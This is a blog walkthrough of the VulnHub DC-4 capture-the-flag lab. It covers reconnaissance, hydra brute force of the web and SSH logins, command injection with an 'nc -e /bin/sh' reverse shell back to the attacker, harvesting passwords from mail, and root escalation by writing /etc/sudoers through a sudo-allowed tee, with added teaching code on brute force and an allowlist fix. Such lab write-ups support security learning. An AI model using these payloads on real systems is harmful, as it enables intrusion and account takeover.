Monday, November 11, 2019

VulnHub: DC-4 Walkthrough

First we start off with an Nmap scan of the remote host, with default scripts, version detection and OS detection enabled.

root@ubuntu:~# nmap -sC -sV -O -T5 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-02 10:18 MDT
Nmap scan report for dc-2 (192.168.56.101)
Host is up (0.00061s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (EdDSA)
80/tcp open  http    nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 08:00:27:B3:AB:48 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds
root@ubuntu:~# 

Nmap came back with two open ports: 22 (OpenSSH 7.4 on Debian 9) and 80 (nginx 1.15.10, page title "System Tools"). Let's fire up Nikto and see what it finds on the web server.

root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2019-11-02 10:21:32 (GMT-6)
---------------------------------------------------------------------------
+ Server: nginx/1.15.10
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie PHPSESSID created without the httponly flag
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 7946 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2019-11-02 10:21:46 (GMT-6) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program# 

Nikto didn't find much of interest: a few missing hardening headers, a PHPSESSID cookie set without the HttpOnly flag, and a #wp-config.php# hit that is worth verifying by hand before trusting it, since nothing else here suggests WordPress. Let's run dirb against the remote host and cross our fingers.

root@ubuntu:~/src/nikto/program# dirb http://192.168.56.101

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Nov  2 10:23:52 2019
URL_BASE: http://192.168.56.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.101/ ----
==> DIRECTORY: http://192.168.56.101/css/                                                                                                                                                              
==> DIRECTORY: http://192.168.56.101/images/                                                                                                                                                           
+ http://192.168.56.101/index.php (CODE:200|SIZE:506)                                                                                                                                                  
                                                                                                                                                                                                       
---- Entering directory: http://192.168.56.101/css/ ----
                                                                                                                                                                                                       
---- Entering directory: http://192.168.56.101/images/ ----
                                                                                                                                                                                                       
-----------------
END_TIME: Sat Nov  2 10:23:55 2019
DOWNLOADED: 13836 - FOUND: 1
root@ubuntu:~/src/nikto/program# 

Dirb didn't come back with anything interesting either, just index.php and two static directories. If we visit the index page we are greeted with an admin login page.

If we capture the login request with Burp, the form POSTs the following body to login.php:

username=admin&password=password

We can hand that format to hydra's http-post-form module to brute force the admin login. The trailing S=logout condition tells hydra to treat any response containing the string "logout" as a successful login (a failed login returns a page without it).

root@ubuntu:~# hydra -l admin -P /home/sam/wordlists/1000-most-common-passwords.txt 192.168.56.101 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout"
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-11-02 10:53:24
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1002 login tries (l:1/p:1002), ~63 tries per task
[DATA] attacking http-post-form://192.168.56.101:80//login.php:username=^USER^&password=^PASS^:S=logout
[80][http-post-form] host: 192.168.56.101   login: admin   password: happy
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-11-02 10:53:28
root@ubuntu:~# 
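To make the S=logout check concrete, here is an added example (not part of the original walkthrough) that reproduces hydra's approach in Python against a constructed in-process mock of login.php. The field names, the success marker and the valid password "happy" come from the walkthrough; the mock server, the wordlist and the helper names are assumptions made for this example.

```python
"""Success-string login brute force, in the style of hydra http-post-form S=...

The target is a constructed in-process mock of login.php: it answers with a
page containing the word "logout" only when the credentials are right.
Everything about the mock (credential store, HTML, port) is assumed.
"""
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlencode
from urllib.request import Request, urlopen

VALID = {"admin": "happy"}  # constructed credential store for the mock


class MockLogin(BaseHTTPRequestHandler):
    """Minimal stand-in for login.php: username/password form, 200 either way."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        if VALID.get(user) == password:
            body = b"<p>Welcome admin</p><a href='logout.php'>logout</a>"
        else:
            body = b"<p>Login failed, please try again</p>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the mock quiet
        pass


def start_mock():
    """Start the mock on a random loopback port in a background thread."""
    srv = HTTPServer(("127.0.0.1", 0), MockLogin)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def try_login(url, user, password, success_marker="logout"):
    """One attempt: POST the form, succeed if the marker is in the body (hydra S=)."""
    data = urlencode({"username": user, "password": password}).encode()
    req = Request(url, data=data, method="POST")
    with urlopen(req, timeout=5) as resp:
        return success_marker in resp.read().decode(errors="replace")


def brute_force(url, user, wordlist, success_marker="logout"):
    """Return the first password whose response contains the marker, else None."""
    for candidate in wordlist:
        if try_login(url, user, candidate, success_marker):
            return candidate
    return None


# Constructed wordlist standing in for 1000-most-common-passwords.txt.
WORDLIST = ["123456", "password", "letmein", "happy", "qwerty"]


def run_demo():
    """Spin up the mock, brute force it, shut it down; returns the found password."""
    srv = start_mock()
    try:
        url = f"http://127.0.0.1:{srv.server_address[1]}/login.php"
        return brute_force(url, "admin", WORDLIST)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print("found password:", run_demo())
```

The weak spot in this technique is the marker: if every page on the target contains "logout" (a footer link, say), every attempt looks like a success. Check one known-bad login by hand first, and consider hydra's F= form (match on a failure string such as "Login failed") when that is the more distinctive text.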

Hydra finds a working username and password combination (admin / happy). Let's log in and see what we have.

Once logged in, the page lets us run a handful of predefined commands. Capturing the request in Burp shows the following POST body:

radio=ls+l&submit=Run

The radio parameter is passed straight to the shell, so we can replace it with a command of our own. Cat'ing the handler script itself gives us the page source and confirms why this works:

command.php
<?php
// The "radio" form value is taken straight from the POST body ...
$my_cmd = $_POST['radio'];
//echo $my_cmd;
// ... and handed to /bin/sh with no validation or allowlist at all.
$output = shell_exec($my_cmd);
print $output;
?>
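The following is an added example, not code from the walkthrough or from the DC-4 image. It models the radio handler above in Python: the vulnerable dispatcher passes the submitted string to a shell exactly as shell_exec does, while the hardened version treats the form value only as a key into a server-side allowlist of fixed argv lists and refuses anything else. The allowlist keys and the commands behind them are assumptions made for the example.

```python
"""Command injection via a form value: vulnerable dispatcher vs. allowlist.

run_vulnerable mirrors shell_exec($_POST['radio']); run_hardened is the fix.
The ALLOWED table is assumed for this example and is not from the DC-4 page.
"""
import subprocess


def run_vulnerable(radio: str) -> str:
    # shell=True hands the raw string to /bin/sh, so metacharacters in the
    # parameter (; | && $() `) become additional commands, exactly as in
    # shell_exec(). "ls -l; nc -e /bin/sh ..." runs both.
    return subprocess.run(radio, shell=True, capture_output=True, text=True).stdout


# Hardened: the client only ever chooses a key; the argv that runs is fixed here.
ALLOWED = {
    "ls -l": ["ls", "-l", "/tmp"],   # assumed directory for the listing
    "id": ["id"],
    "date": ["date", "-u"],
}


def is_permitted(radio: str) -> bool:
    """True only for an exact allowlist key; any injected suffix fails this."""
    return radio in ALLOWED


def run_hardened(radio: str) -> str:
    if not is_permitted(radio):
        raise ValueError(f"command not permitted: {radio!r}")
    argv = ALLOWED[radio]
    # shell=False: argv goes to execve directly, nothing is re-parsed by a shell.
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    # Vulnerable: the second command runs too.
    print(run_vulnerable("echo listing; echo injected").rstrip())
    # Hardened: an exact key works ...
    print(run_hardened("id").rstrip())
    # ... but the same payload shape the walkthrough uses is rejected.
    try:
        run_hardened("id; nc -e /bin/sh 192.168.56.1 4444")
    except ValueError as err:
        print("rejected:", err)
```

The allowlist approach is the fix to reach for here: escaping the string (escapeshellcmd and friends) still leaves the user in control of which program runs, whereas a key-to-argv map means the only thing the client can influence is which of a few fixed commands executes.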

If we inject a reverse shell instead, we get a connection back to our local machine and can upgrade it to a proper PTY with python:

radio=nc+-e+/bin/sh+192.168.56.1+4444&submit=Run
root@ubuntu:~# nc -l -v -p 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from dc-4 59178 received!
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)           
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-4:/usr/share/nginx/html$ 

We cat /etc/passwd and look for accounts with a real login shell.

www-data@dc-4:/usr/share/nginx/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
nginx:x:107:111:nginx user,,,:/nonexistent:/bin/false
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash
Debian-exim:x:108:112::/var/spool/exim4:/bin/false
www-data@dc-4:/usr/share/nginx/html$

Besides root, three regular users have a login shell:

charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash

If we change to jim's home directory and list its contents we find some interesting results.

www-data@dc-4:/home$ cd jim
cd jim
www-data@dc-4:/home/jim$ ls -la
ls -la
total 32
drwxr-xr-x 3 jim  jim  4096 Apr  7  2019 .
drwxr-xr-x 5 root root 4096 Apr  7  2019 ..
-rw-r--r-- 1 jim  jim   220 Apr  6  2019 .bash_logout
-rw-r--r-- 1 jim  jim  3526 Apr  6  2019 .bashrc
-rw-r--r-- 1 jim  jim   675 Apr  6  2019 .profile
drwxr-xr-x 2 jim  jim  4096 Apr  7  2019 backups
-rw------- 1 jim  jim   528 Apr  6  2019 mbox
-rwsrwxrwx 1 jim  jim   174 Apr  6  2019 test.sh
www-data@dc-4:/home/jim$ 

We see two files, mbox (readable only by jim) and test.sh, which is world-writable and has the setuid bit set. If we cat the contents of test.sh we find:

www-data@dc-4:/home/jim$ cat test.sh
cat test.sh
#!/bin/bash
for i in {1..5}
do
 sleep 1
 echo "Learn bash they said."
 sleep 1
 echo "Bash is good they said."
done
 echo "But I'd rather bash my head against a brick wall."
www-data@dc-4:/home/jim$ 

So there is nothing interesting in the content of test.sh, and a search for setuid files confirms it is the only non-standard one on the box. It is a red herring rather than a privilege escalation path, though: the Linux kernel ignores the setuid bit on interpreted scripts (anything run through a #! interpreter), so even though the file is world-writable, editing it would not get us jim's privileges.

www-data@dc-4:/home/jim$ find / -xdev -perm -4000 -type f 2>/dev/null
find / -xdev -perm -4000 -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
/bin/ping
/home/jim/test.sh
www-data@dc-4:/home/jim$ 

Moving on to the backups directory, we find a file called old-passwords.bak, which we can use as a wordlist for brute-forcing SSH. After copying old-passwords.bak to our local machine (saved here as old-pass.txt) we run hydra against SSH with jim as the username.

root@ubuntu:~/src/nikto/program# hydra -l jim -P /home/sam/old-pass.txt ssh://192.168.56.101
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-11-02 11:27:46
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://192.168.56.101:22/
[22][ssh] host: 192.168.56.101   login: jim   password: jibril04
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2019-11-02 11:28:43
root@ubuntu:~/src/nikto/program# 

Hydra found a valid username and password combination (jim / jibril04). The warnings and errors at the end are what hydra's own hint is about: 16 parallel SSH sessions trip the server's connection limits, so some workers never completed. The hit was already in, but with a longer list it is safer to follow the advice and use -t 4. Now it's time to log in as jim and see what we can do.

root@ubuntu:~/src/nikto/program# ssh jim@192.168.56.101
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
ECDSA key fingerprint is SHA256:vtcgdCXO4d3KmnjiIIkH1Een5F1AiSx3qp0ABgwdvww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.101' (ECDSA) to the list of known hosts.
jim@192.168.56.101's password: 
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr  7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$ 

We notice the login banner says "You have mail". The mbox file in jim's home directory is a saved message; running strings on it shows a single test email from root, headers and all, with nothing useful in it.

jim@dc-4:~$ strings mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: 
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
 (envelope-from )
 id 1hCiQe-0000gc-EC
 for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: 
From: root 
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO
This is a test.
jim@dc-4:~$ 

Let's check /var/mail/jim, the actual inbox, and read what is waiting there.

jim@dc-4:~$ cd /var/mail
jim@dc-4:/var/mail$ ls -la
total 12
drwxrwsr-x  2 root mail 4096 Apr  6  2019 .
drwxr-xr-x 12 root root 4096 Apr  5  2019 ..
-rw-rw----  1 jim  mail  715 Apr  6  2019 jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: 
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
 (envelope-from )
 id 1hCjIX-0000kO-Qt
 for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: 
From: Charles 
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

jim@dc-4:/var/mail$ 

That gives us Charles's password in plaintext. Let's su to charles and see what he can do.

jim@dc-4:/var/mail$ su charles
Password: 
charles@dc-4:/var/mail$ id
uid=1001(charles) gid=1001(charles) groups=1001(charles)
charles@dc-4:/var/mail$ 

charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee
charles@dc-4:~$ 

We are able to run /usr/bin/teehee as root without a password, and it is just the tee binary renamed. tee copies its stdin to a file, so as root it can write anywhere, including /etc/sudoers. We append a rule granting charles full sudo rights (sudoers is a file, not a group) and then switch to root. Two caveats: tee without -a truncates the target file, so the command below replaces /etc/sudoers with that single line and discards every existing rule, including the NOPASSWD entry for teehee (use teehee -a to append, or write a new file under /etc/sudoers.d/ instead); and the new rule does not carry NOPASSWD, which is why the sudo su that follows asks for charles's password.
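The added example below (not part of the walkthrough) shows the difference that -a makes, using the real tee binary against a temporary file seeded with constructed sudoers rules rather than against /etc/sudoers. The seed rules and file names are assumptions made for the example.

```python
"""tee versus tee -a: why `echo rule | sudo teehee /etc/sudoers` clobbers the file.

Runs the system tee against throwaway files in a temp directory; nothing here
touches /etc/sudoers. The SEED rules are constructed for the example.
"""
import os
import subprocess
import tempfile

# Constructed stand-in for an existing /etc/sudoers.
SEED = (
    "root ALL=(ALL:ALL) ALL\n"
    "charles ALL=(root) NOPASSWD: /usr/bin/teehee\n"
)
# The rule the walkthrough injects.
RULE = "charles ALL=(ALL:ALL) ALL\n"


def write_with_tee(path: str, text: str, append: bool) -> list[str]:
    """Pipe text into tee (optionally with -a) and return the file's lines."""
    argv = ["tee"] + (["-a"] if append else []) + [path]
    subprocess.run(argv, input=text, text=True, capture_output=True, check=True)
    with open(path, encoding="utf-8") as fh:
        return fh.read().splitlines()


def demo() -> dict[str, list[str]]:
    """Seed two copies of the file, overwrite one and append to the other."""
    with tempfile.TemporaryDirectory() as workdir:
        truncated = os.path.join(workdir, "sudoers-without-a")
        appended = os.path.join(workdir, "sudoers-with-a")
        for path in (truncated, appended):
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(SEED)
        return {
            "truncated": write_with_tee(truncated, RULE, append=False),
            "appended": write_with_tee(appended, RULE, append=True),
        }


if __name__ == "__main__":
    result = demo()
    print("without -a:", result["truncated"])   # only the injected rule survives
    print("with -a:   ", result["appended"])    # seed rules plus the new one
```

Whichever way the file is written, `sudo visudo -c` afterwards checks that it still parses: a syntax error in /etc/sudoers locks every user out of sudo, which on a real engagement turns a quiet privilege escalation into a very visible outage.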

charles@dc-4:~$ echo "charles ALL=(ALL:ALL) ALL" | sudo /usr/bin/teehee /etc/sudoers
charles ALL=(ALL:ALL) ALL
charles@dc-4:~$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for charles: 
root@dc-4:/home/charles# id
uid=0(root) gid=0(root) groups=0(root)
root@dc-4:/home/charles# whoami
root
root@dc-4:/home/charles# cd /root
root@dc-4:~# ls
flag.txt
root@dc-4:~# cat flag.txt



888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
root@dc-4:~# 
